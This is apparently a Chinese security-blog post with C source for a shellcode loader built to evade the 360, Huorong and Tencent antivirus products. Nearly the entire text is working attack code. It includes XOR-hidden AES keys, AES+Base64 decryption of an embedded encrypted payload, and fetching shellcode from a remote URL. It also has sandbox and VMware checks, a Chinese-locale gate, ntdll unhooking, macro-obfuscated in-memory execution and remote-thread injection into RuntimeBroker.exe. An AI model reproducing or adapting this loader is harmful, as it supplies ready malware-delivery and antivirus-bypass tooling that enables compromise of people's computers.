点击蓝字 关注我们
点击蓝字 关注我们
声明
本文作者:CKCsec安全研究院
本文字数:5166
阅读时长:7 分钟
项目/链接:文末获取
本文属于【CKCsec安全研究院】原创投稿奖励文章,未经许可禁止转载
这里我实现了C语言的免杀操作,可以绕过常见国内杀软例如360等等
大致思路就是把shellcode加密隐藏 然后远程获取解密 或者写死在文件中解密,这里我用的是AES加密,解密之后加载运行。
获取key和iv
AES加密是我在网上找的现成的C的库,AES由密钥KEY和IV我不想要KEY和IV在内存中一起出现,开始我用了数组一个一个赋值,还是不行,最后怎么办呢,最后我用一个异或的函数,用到key和iv的时候就用函数来获取,这样在内存就看不到我的key和iv了
static char* GetEncryptionKey()
{
static char data[] = {
'a' ^ (0x27 - 0), 'o' ^ (0x27 - 1), 't' ^ (0x27 - 2), 'e' ^ (0x27 - 3), 'm' ^ (0x27 - 4), 'a' ^ (0x27 - 5), 'n' ^ (0x27 - 6),
'x' ^ (0x27 - 7), 'i' ^ (0x27 - 8), 'a' ^ (0x27 - 9), 'o' ^ (0x27 - 10), 'g' ^ (0x27 - 11), 'u' ^ (0x27 - 12), 'a' ^ (0x27 - 13), 'i' ^ (0x27 - 14), 's' ^ (0x27 - 15),
' '
};
static bool isEncrypted = true;
if (isEncrypted)
{
for (unsigned i = 0; i < (sizeof(data) / sizeof(data[0])) - 1; ++i)
{
data[i] = (data[i] ^ (0x27 - i));
}
isEncrypted = false;
}
return data;
}
这里可以看到通过这个函数实现,成果在winhex下看不到了啊key和iv
获取随机字符串
然后我想做一个混淆来混淆我的key和iv,让别人认为这个他们在winhex之类的东西下看到的是正确的key和iv,但是其实他们是我随机生成的字符串
int get_random_str(char* random_str, const int random_len)
{
int i, random_num, seed_str_len;
struct timeval tv;
unsigned int seed_num;
char seed_str[] = "abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; //随机字符串的随机字符集
seed_str_len = strlen(seed_str);
int gettimeofday(struct timeval* tp, void* tzp);
gettimeofday(&tv, NULL);
seed_num = (unsigned int)(tv.tv_sec + tv.tv_usec); //超了unsigned int的范围也无所谓,我们要的只是不同的种子数字
srand(seed_num);
for (i = 0; i < random_len; i++)
{
random_num = rand() % seed_str_len;
random_str[i] = seed_str[random_num];
}
return 0;
}
int gettimeofday(struct timeval* tp, void* tzp)
{
time_t clock;
struct tm tm;
SYSTEMTIME wtm;
GetLocalTime(&wtm);
tm.tm_year = wtm.wYear - 1900;
tm.tm_mon = wtm.wMonth - 1;
tm.tm_mday = wtm.wDay;
tm.tm_hour = wtm.wHour;
tm.tm_min = wtm.wMinute;
tm.tm_sec = wtm.wSecond;
tm.tm_isdst = -1;
clock = mktime(&tm);
tp->tv_sec = clock;
tp->tv_usec = wtm.wMilliseconds * 1000;
return (0);
}
AES解密
这里AES加密解密
前人栽树,后人乘凉
https://github.com/fengwenhua/lazy_importer_aav
这里是我修改后的函数,加密和解密就是AES+Base64
这里提一句,这里加密的时候 要把x64x38这种机器码的x去掉
string DecryptionAES(const string& strSrc)
{
string strData = base64_decode(strSrc);
size_t length = strData.length();
char* key1 = GetEncryptionKey();
char a[17];
strcpy(a, key1);
char* key2 = GetEncryptionKey2();
char b[17];
strcpy(b, key2);
char* szDataIn = new char[length + 1];
memcpy(szDataIn, strData.c_str(), length + 1);
char* szDataOut = new char[length + 1];
memcpy(szDataOut, strData.c_str(), length + 1);
AES aes;
aes.MakeKey(a, b, 16, 16);
aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
if (0x00 < szDataOut[length - 1] <= 0x16)
{
int tmp = szDataOut[length - 1];
for (int i = length - 1; i >= length - tmp; i--)
{
if (szDataOut[i] != tmp)
{
memset(szDataOut, 0, length);
break;
}
else
szDataOut[i] = 0;
}
}
string strDest(szDataOut);
delete[] szDataIn;
delete[] szDataOut;
return strDest;
}
远程获取
这里实现远程获取,就是获取网页上你放的加密后的shell凑的
LPSTR GetInterNetURLText(LPSTR lpcInterNetURL, char* buff)
{
HINTERNET hSession;
LPSTR lpResult = NULL;
hSession = InternetOpen(_T("WinInet"), INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
__try
{
if (hSession != NULL)
{
HINTERNET hRequest;
hRequest = InternetOpenUrlA(hSession, lpcInterNetURL, NULL, 0, INTERNET_FLAG_RELOAD, 0);
__try
{
if (hRequest != NULL)
{
DWORD dwBytesRead;
char szBuffer[BUF_SIZE] = { 0 };
if (InternetReadFile(hRequest, szBuffer, BUF_SIZE, &dwBytesRead))
{
RtlMoveMemory(buff, szBuffer, BUF_SIZE);
return 0;
}
}
}
__finally
{
InternetCloseHandle(hRequest);
}
}
}
__finally
{
InternetCloseHandle(hSession);
}
return lpResult;
}
绕沙箱,虚拟机
//先绕沙箱
BypassSimulation();
check();
ULONG uptime = GetTickCount();
if (uptime >= 10 * 60 * 1000) {
MessageBox(NULL, L"程序异常!", L"异常,请稍后", MB_OK | MB_ICONERROR);
}
else {
exit(1);
}
UNHOOKntdll();
DWORD UNHOOKntdll() {
MODULEINFO mi = {};
HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");
GetModuleInformation(HANDLE(-1), ntdllModule, &mi, sizeof(mi));
LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
HANDLE ntdllFile = CreateFileA("c:\windows\system32\ntdll.dll",
GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL,
PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);
PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase +
hookedDosHeader->e_lfanew);
for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
PIMAGE_SECTION_HEADER hookedSectionHeader =
(PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader)
+ ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
DWORD oldProtection = 0;
bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase
+ (DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
memcpy((LPVOID)((DWORD_PTR)ntdllBase +
(DWORD_PTR)hookedSectionHeader->VirtualAddress),
(LPVOID)((DWORD_PTR)ntdllMappingAddress
+ (DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize);
isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase +
(DWORD_PTR)hookedSectionHeader->VirtualAddress),
hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
}
}
}
void BypassSimulation()
{
HANDLE snapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == snapShot)
{
return;
}
PROCESSENTRY32 pe = { sizeof(pe) };
int num = 0;
for (BOOL ret = Process32First(snapShot, &pe); ret; ret = Process32Next(snapShot, &pe))
{
num++;
}
if (num <= 60)
{
exit(1);
}
}
void RunCode() {}
int check1() {
LANGID langId = GetUserDefaultUILanguage();
if (PRIMARYLANGID(langId) == LANG_CHINESE)
{
RunCode();
}
else
{
exit(1);
}
return 0;
}
bool checkReg() {
HKEY hkey;
if (RegOpenKey(HKEY_CLASSES_ROOT, L"\Applications\VMwareHostOpen.exe",
&hkey) == ERROR_SUCCESS) {
return true;
}
else {
return false;
}
}
bool checkfile() {
WIN32_FIND_DATAW findFileData;
if (FindFirstFileW(L"C:\Program Files\VMware\VMware Tools\VMToolsHook.dll",
&findFileData) == INVALID_HANDLE_VALUE)
return false;
}
bool CheckProcess() {
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD pid = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
CloseHandle(hProcessSnap);
exit(-1);
}
pe32.dwSize = sizeof(PROCESSENTRY32);
BOOL bRet = Process32First(hProcessSnap, &pe32);
if (!bRet)
{
exit(-2);
}
while (bRet)
{
if (wcscmp(pe32.szExeFile, L"vmtoolsd.exe") == 0) {
pid = pe32.th32ProcessID;
return true;
}
if (wcscmp(pe32.szExeFile, L"vmwaretrat.exe") == 0) {
pid = pe32.th32ProcessID;
return true;
}
if (wcscmp(pe32.szExeFile, L"vmwareuser.exe") == 0) {
pid = pe32.th32ProcessID;
return true;
}
if (wcscmp(pe32.szExeFile, L"vmacthlp.exe") == 0) {
pid = pe32.th32ProcessID;
return true;
}
bRet = Process32Next(hProcessSnap, &pe32);
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
CloseHandle(hProcessSnap);
return false;
}
延时执行
int iResult;
DWORD timeout = delay;
DWORD OK = TRUE;
SOCKADDR_IN sa = { 0 };
SOCKET sock = INVALID_SOCKET;
do {
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr("8.8.8.8");
sa.sin_port = htons(80);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == INVALID_SOCKET) {
OK = FALSE;
break;
}
// setting socket timeout
unsigned long iMode = 1;
iResult = ioctlsocket(sock, FIONBIO, &iMode);
iResult = connect(sock, (SOCKADDR*)&sa, sizeof(sa));
if (iResult == false) {
OK = FALSE;
break;
}
iMode = 0;
iResult = ioctlsocket(sock, FIONBIO, &iMode);
if (iResult != NO_ERROR) {
OK = FALSE;
break;
}
// fd set data
fd_set Write, Err;
FD_ZERO(&Write);
FD_ZERO(&Err);
FD_SET(sock, &Write);
FD_SET(sock, &Err);
timeval tv = { 0 };
tv.tv_usec = timeout * 1000;
// 检查套接字是否准备就绪,此调用应占用超时毫秒
select(0, NULL, &Write, &Err, &tv);
if (FD_ISSET(sock, &Err)) {
OK = FALSE;
break;
}
} while (false);
if (sock != INVALID_SOCKET)
closesocket(sock);
VOID CALLBACK TimerFunction(UINT uTimerID, UINT uMsg, DWORD_PTR dwUser, DWORD_PTR dw1, DWORD_PTR dw2)
{
bProcessed = TRUE;
}
VOID timing_timeSetEvent(UINT delayInSeconds)
{
UINT uResolution;
TIMECAPS tc;
MMRESULT idEvent;
timeGetDevCaps(&tc, sizeof(TIMECAPS));
uResolution = min(max(tc.wPeriodMin, 0), tc.wPeriodMax);
idEvent = timeSetEvent(
delayInSeconds,
uResolution,
TimerFunction,
0,
TIME_ONESHOT);
while (!bProcessed){
Sleep(0);
}
timeKillEvent(idEvent);
timeEndPeriod(uResolution);
}
进程注入
这里进程注入,太难了 360直接就杀了
还是看一下,这里这个函数实现的是找到对应进程进行注入
static int getpid()
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD pid = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
CloseHandle(hProcessSnap);
exit(-1);
}
pe32.dwSize = sizeof(PROCESSENTRY32);
BOOL bRet = Process32First(hProcessSnap, &pe32);
if (!bRet)
{
exit(-2);
}
while (bRet)
{
if (wcscmp(pe32.szExeFile, L"RuntimeBroker.exe") == 0) {
pid = pe32.th32ProcessID;
break;
}
bRet = Process32Next(hProcessSnap, &pe32);
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
CloseHandle(hProcessSnap);
return pe32.th32ProcessID;
}
主函数
这里就是我的主函数,主函数里面奇奇怪怪的是我用一个代码混淆工具混淆的
工具下载地址
https://zhiji.lanzoul.com/iChqv1nbdszc
注释就是原来的
int main(int argc, char* argv[])
{
ULONG uptime = GetTickCount();
BypassSimulation();
check1();
//if(checkReg()){ exit(1); }
// if (checkfile()) { exit(1); }
//if (CheckProcess()) { exit(1); }
if (uptime >= 10 * 60 * 1000) {
MessageBox(NULL, L"程序异常!", L"异常,请稍后", MB_OK | MB_ICONERROR);
}
else {
exit(1);
}
UNHOOKntdll();
int pid;
pid = getpid();
//char buf[BUF_SIZE] = { 0 };
// char url[MAX_PATH] = "http://192.168.1.122:8000/1.txt";
//GetInterNetURLText(url, buf);
char buf[] = "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";
//string strbuf = DecryptionAES(buf);
//char buff[BUF_SIZE] = { 0 };
//int num=0;
//for (int i = 0; i < strbuf.length(); i++,num++) {
// buff[i] = strbuf[i];
//}
#define C14 DecryptionAES(buf);
#define C13 strbuf.length();
#define C12 buff[BUF_SIZE]
#define C11 i++,num++)
#define C10 strbuf[i];
#define CF buff[i]
#define CE num=0;
#define CD strbuf
#define CC string
#define CB (int
#define CA char
#define C9 for
#define C8 int
#define C7 0;
#define C6 };
#define C5 0
#define C4 <
#define C3 =
#define C2 i
#define C1 {
#define C0 }
#define C15 CC CD C3 C14 CA C12 C3 C1 C5 C6
#define C16 C8 CE C9 CB C2 C3 C7 C2 C4 C13
#define C17 C11 C1 CF C3 C10 C0
#define C18 C15 C16 C17
#define C19(__FOX__) __FOX__
C19(C18)
//char* p = buff;
//unsigned char* abcd = (unsigned char*)calloc(strlen(buff) / 2, sizeof(unsigned char));
//for (size_t i = 0; i < strlen(buff) / 2; i++) {
// sscanf(p, "%2hhx", &abcd[i]);
// p += 2;
//}
#define A17 sscanf(p, "%2hhx", &abcd[i]);
#define A16 char*)calloc(strlen(buff)
#define A15 sizeof(unsigned
#define A14 strlen(buff)
#define A13 (unsigned
#define A12 unsigned
#define A11 (size_t
#define A10 char));
#define AF buff;
#define AE char*
#define AD abcd
#define AC i++)
#define AB for
#define AA +=
#define A9 0;
#define A8 2,
#define A7 2;
#define A6 /
#define A5 <
#define A4 =
#define A3 i
#define A2 p
#define A1 {
#define A0 }
#define A18 AE A2 A4 AF A12 AE AD A4 A13 A16
#define A19 A6 A8 A15 A10 AB A11 A3 A4 A9 A3
#define A1A A5 A14 A6 A7 AC A1 A17 A2 AA A7
#define A1B A0
#define A1C A18 A19 A1A A1B
#define A1D(__FOX__) __FOX__
A1D(A1C)
////先绕沙箱
//BypassSimulation();
//check();
//ULONG uptime = GetTickCount();
//if (uptime >= 10 * 60 * 1000) {
// MessageBox(NULL, L"程序异常!", L"异常,请稍后", MB_OK | MB_ICONERROR);
//}
//else {
// exit(1);
//}
//UNHOOKntdll();
char str[14];
get_random_str(str, 16);
get_random_str(str, 16);
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
get_random_str(str, 16);
SIZE_T bufSize = strlen(buff) / 2;
get_random_str(str, 16);
//BOOL pt;
//DWORD oldProtect;
//LPVOID zyhm;
//zyhm = VirtualAlloc(NULL, bufSize, MEM_COMMIT, 0x04);
//CopyMemory(zyhm, abcd, bufSize);
//pt = VirtualProtect(zyhm, bufSize, 0x20, &oldProtect);
//((void(*)())zyhm)();
#define F12 (LPSTR)VirtualAlloc(0,
#define F11 ((void(*)())zyhm)();
#define F10 VirtualProtect(zyhm,
#define FF PAGE_EXECUTE_READ,
#define FE PAGE_READWRITE);
#define FD &oldProtect);
#define FC memcpy(zyhm,
#define FB MEM_COMMIT,
#define FA oldProtect;
#define F9 bufSize);
#define F8 bufSize,
#define F7 DWORD
get_random_str(str, 16);
#define F6 LPSTR
#define F5 abcd,
get_random_str(str, 16);
#define F4 BOOL
#define F3 zyhm
#define F2 pt;
#define F1 pt
#define F0 =
#define F13 F7 FA F4 F2 F6 F3 F0 F12 F8 FB
#define F14 FE FC F5 F9 F1 F0 F10 F8 FF FD
#define F15 F11
#define F16 F13 F14 F15
#define F17(__FOX__) __FOX__
F17(F16)
//DWORD oldProtect;
//BOOL pt;
//LPSTR zyhm = (LPSTR)VirtualAlloc(0, bufSize, MEM_COMMIT, PAGE_READWRITE);
//memcpy(zyhm, abcd, bufSize);
//pt = VirtualProtect(zyhm, bufSize, PAGE_EXECUTE_READ, &oldProtect);
//((void(*)())zyhm)();
//processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(10216));
//remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
//WriteProcessMemory(processHandle, remoteBuffer, buf, sizeof buf, NULL);
//remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
//CloseHandle(processHandle);
//#define J5 remoteThread = LI_FN(CreateRemoteThread)(processHandle, nullptr, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, nullptr, 0, nullptr);
//#define J4 remoteBuffer = LI_FN(VirtualAllocEx)(processHandle, nullptr, bufSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
//#define J3 LI_FN(WriteProcessMemory)(processHandle, remoteBuffer, abcd, bufSize, nullptr);
//#define J2 processHandle = LI_FN(OpenProcess)(PROCESS_ALL_ACCESS, FALSE, DWORD(pid));
//#define J1 LI_FN(CloseHandle)(processHandle);
//#define J0 get_random_str(str, 16);
//#define J6 J0 J2 J0 J4 J0 J3 J0 J5 J0 J1
//#define J7(__FOX__) __FOX__
//J7(J6)
return 0;
加载器
这里我还是把加载器给出来
//processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(10216));
//remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
//WriteProcessMemory(processHandle, remoteBuffer, buf, sizeof buf, NULL);
//remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
//CloseHandle(processHandle);
//#define J5 remoteThread = LI_FN(CreateRemoteThread)(processHandle, nullptr, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, nullptr, 0, nullptr);
//#define J4 remoteBuffer = LI_FN(VirtualAllocEx)(processHandle, nullptr, bufSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
//#define J3 LI_FN(WriteProcessMemory)(processHandle, remoteBuffer, abcd, bufSize, nullptr);
//#define J2 processHandle = LI_FN(OpenProcess)(PROCESS_ALL_ACCESS, FALSE, DWORD(pid));
//#define J1 LI_FN(CloseHandle)(processHandle);
//#define J0 get_random_str(str, 16);
//#define J6 J0 J2 J0 J4 J0 J3 J0 J5 J0 J1
//#define J7(__FOX__) __FOX__
//J7(J6)
//BOOL pt;
//DWORD oldProtect;
//LPVOID zyhm;
//zyhm = VirtualAlloc(NULL, bufSize, MEM_COMMIT, 0x04);
//CopyMemory(zyhm, abcd, bufSize);
//pt = VirtualProtect(zyhm, bufSize, 0x20, &oldProtect);
//((void(*)())zyhm)();
#define F12 (LPSTR)VirtualAlloc(0,
#define F11 ((void(*)())zyhm)();
#define F10 VirtualProtect(zyhm,
#define FF PAGE_EXECUTE_READ,
#define FE PAGE_READWRITE);
#define FD &oldProtect);
#define FC memcpy(zyhm,
#define FB MEM_COMMIT,
#define FA oldProtect;
#define F9 bufSize);
#define F8 bufSize,
#define F7 DWORD
get_random_str(str, 16);
#define F6 LPSTR
#define F5 abcd,
get_random_str(str, 16);
#define F4 BOOL
#define F3 zyhm
#define F2 pt;
#define F1 pt
#define F0 =
#define F13 F7 FA F4 F2 F6 F3 F0 F12 F8 FB
#define F14 FE FC F5 F9 F1 F0 F10 F8 FF FD
#define F15 F11
#define F16 F13 F14 F15
#define F17(__FOX__) __FOX__
F17(F16)
//DWORD oldProtect;
//BOOL pt;
//LPSTR zyhm = (LPSTR)VirtualAlloc(0, bufSize, MEM_COMMIT, PAGE_READWRITE);
//memcpy(zyhm, abcd, bufSize);
//pt = VirtualProtect(zyhm, bufSize, PAGE_EXECUTE_READ, &oldProtect);
//((void(*)())zyhm)();
最后测试结果
参考文章:
https://mp.weixin.qq.com/s/D9y4cVpU2ZFraokiHZJkYQ
https://github.com/fengwenhua/lazy_importer_aav
原文始发于微信公众号(CKCsec安全研究院):免杀技术探讨之过主流杀软:360&火绒&tx电脑管家